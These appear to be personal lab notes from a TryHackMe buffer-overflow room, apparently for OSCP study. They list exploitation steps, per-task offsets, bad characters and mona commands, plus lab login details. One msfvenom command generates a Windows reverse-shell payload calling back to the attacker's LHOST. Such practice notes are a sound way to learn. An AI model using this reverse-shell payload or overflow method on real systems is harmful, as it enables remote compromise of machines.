TryHackMe -BufferOVerFlow Room

Practice stack-based buffer overflows!

This is simple write there swill be no screenshot, flag etc

Steps to involve in BufferOverFlow

1. Find IP, Port and sending message
2. Fuzzing and find crash point
3. create pattern {./usr/share/metasploit-framework/tools/exploit/pattern_create -l size_of_crash
4. Send created pattern and determine EIP
5. find oddset from EIP /usr/share/metasploit-framework/tools/exploit/Pattern_offset -q EIP
6. Control EIP => “A” * OffsetValue+ “B” *4 +”C” * (buff-len(buff)
7. Find JMP ESP Executive_Module=>kernal32.dll || user32.dll || Shell32.dll
8. find commadn JMP ESP
9. find bad character
10. fina paylaod

OSCP BUfferoverflow Task

TOTal Overflow 10 application

login via freexrdp xfreerdp /v:10.10.17.30 /u:admin /p:password

ip 10.10.17.30

OSCP_BF_1 =>
{
1. Find crash Point => 2000
2, Find Offset => 1978
3. Find BadChar => “\x00\x07\x2e\xa0”
4. find JMP ESP =>625011AF =>\xaf\x11\x50\x62"
5. payload => msfvenom -p windows/shell_reverse_tcp LHOST=192.168.135.128 LPORT=1234 EXITFUNC=thread -b “\x00\x07\x2e\xa0” -f c

}
OSCP_BF_2
{
Send same input with “OVERFLOW2 “ command
1. find crash at 1000
2. find offset 634
3. bad character
}
OSCP_BF_3
{
1. OFFset 634
2. BC => \x00\x23\x3c\x83\xba
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a esp

}
OSCP_BF_4
{
1. find offset 1274
2. Find bad char=> \x00\x11\x40\x5f\xb8\xee
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 010EFA18
}
OSCP_BF_5
{
1. offset 2026
2. BAd char=> \x00\xa9\xcd\xd4
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 009AFA18
}
OSCP_BF_6
{
offset 314
badchar=> \x00\x16\x2f\xf4\xfd
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 00AFFA18
}
OSCP_BF_7
{
offset 1034
badchar=> \x00\x08\x2c\xad ae
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 0096FA18
}
OSCP_BF_8
{
offset 1306
badchar=> \x00\x8c\xae\xbe\xfb
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 0094FA18
}
OSCP_BF_9
{
1. offset 1786
badchar=> \x00\x1d\x2e\xc7\xee ef
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 0109FA18
}
OSCP_BF_10
{
1. offset 1514
badchar=>\x00\x04\x3e\xe1\xe2
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 010EFA18
}
OSCP_BF_11
{
1. offset 537
badchar=> \x00\xa0\xad\xbe\xde\xef
!mona bytearray -b “\x00”
!mona compare -f C:\mona\oscp\bytearray.bin -a 010AFA18
}
nc 10.10.17.30 1337